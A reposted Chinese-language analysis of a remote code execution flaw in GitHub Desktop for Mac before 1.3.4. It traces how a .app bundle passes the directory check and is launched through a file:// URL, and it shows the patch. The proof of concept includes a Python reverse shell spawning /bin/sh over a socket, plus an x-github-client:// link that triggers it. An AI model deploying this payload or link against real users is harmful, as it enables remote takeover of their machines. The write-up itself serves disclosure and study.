Github Desktop for Mac < 1.3.4 RCE 漏洞分析

栏目: 编程工具 · 发布时间: 5年前

内容简介:06 Dec 2018 - Tr3jer_CongRong白天看到老外在H1-702 2018玩的项目,electron的案例不多,感觉有点意思复现下。准备工作:

06 Dec 2018 - Tr3jer_CongRong

白天看到老外在H1-702 2018玩的项目,electron的案例不多,感觉有点意思复现下。

准备工作:

  • https://github.com/desktop/desktop/archive/release-1.3.3.zip
  • 恢复下.git/目录以及所需的文件
  • yarn install
  • yarn build:prod
  • mv dist/GitHub Desktop-darwin-x64/GitHub Desktop.app /Applications

漏洞成因:

首先github的 Clone or download 按钮包含一个 Open in Desktop 的pull方式

验证时发现目前该方式的协议为 github-mac:// 但早起版本的协议应该是 x-github-client:// ,并且包含几个参数:

x-github-client://openRepo/https://github.com/user/repo?branch=master&filepath=README.md

app/src/lib/app-shell.ts

export const shell: IAppShell = {
	moveItemToTrash: electronShell.moveItemToTrash,
	beep: electronShell.beep,
	openExternal: path => {
		return new Promise<boolean>((resolve, reject) => {
			ipcRenderer.once(
				'open-external-result',
				(event: Electron.IpcMessageEvent, { result }: { result: boolean }) => {
					resolve(result)
				}
			)

			ipcRenderer.send('open-external', { path })
		})
	},
	showItemInFolder: path => {
		ipcRenderer.send('show-item-in-folder', { path })
	},
	openItem: electronShell.openItem,
}

ipcRenderer对象使用 show-item-in-folder 事件发送获取到的path

跟进app/src/main-process/main.ts

ipcMain.on(
	'show-item-in-folder',
	(event: Electron.IpcMessageEvent, { path }: { path: string }) => {
		Fs.stat(path, (err, stats) => {
			if (err) {
				log.error(`Unable to find file at '${path}'`, err)
				return
			}

			if (stats.isDirectory()) {
				openDirectorySafe(path)
			} else {
				shell.showItemInFolder(path)
			}
		})
	}
)

ipcMain对象监听到该事件消息后,fs库判断下是否为目录,如果是则传进 openDirectorySafe 。但没有考虑到mac系统下.app也是为目录的

> fs = require('fs')
> fs.stat('/Applications/GitHub Desktop.app',(err,stats)=>{console.log(stats.isDirectory())})
> true

跟进app/src/main-process/shell.ts

export function openDirectorySafe(path: string) {
	if (__DARWIN__) {
		const directoryURL = Url.format({
			pathname: path,
			protocol: 'file:',
			slashes: true,
		})

		shell.openExternal(directoryURL)
	} else {
		shell.openItem(path)
	}
}

判断如果是mac系统则使用 file:// 协议重新构造url,并 shell.openExternal 运行。

POC:

作者编写的py版本 POC ,并用Pyinstaller打包了起来

import socket,subprocess,os;

os.system("open -a calculator.app")

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("localhost",1337));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

本地监听,浏览器打开包含指定POC APP的链接:

x-github-client://openRepo/https://github.com/0xACB/github-desktop-poc?branch=master&filepath=osx/evil-app/rce.app

浏览器询问是否使用GitHub Desktop.app打开,确定并开始clone,随后反弹shell。

Fixed:

fix方式很简单,判断不是mac系统最终才可以打开

-        if (stats.isDirectory()) {
+        if (!__DARWIN__ && stats.isDirectory()) {

以上所述就是小编给大家介绍的《Github Desktop for Mac < 1.3.4 RCE 漏洞分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

爆品方法论

爆品方法论

陈轩 / 2019-1-6 / 49

作者利用自己在品牌定位和爆品营销领域十三年的实践历练,结合移动社交媒体、爆品营销策略和社会心理学,精心筛选出上百个经典的营销案例,既分享了爆品内容的炮制方法和营销原理,也分享了爆品内容的推广技巧,告诉读者如何用移动社交媒体来颠覆传统营销模式,如何用互联网思维来玩转营销,实现低成本、高销量、大传播,成功打造市场爆品。一起来看看 《爆品方法论》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试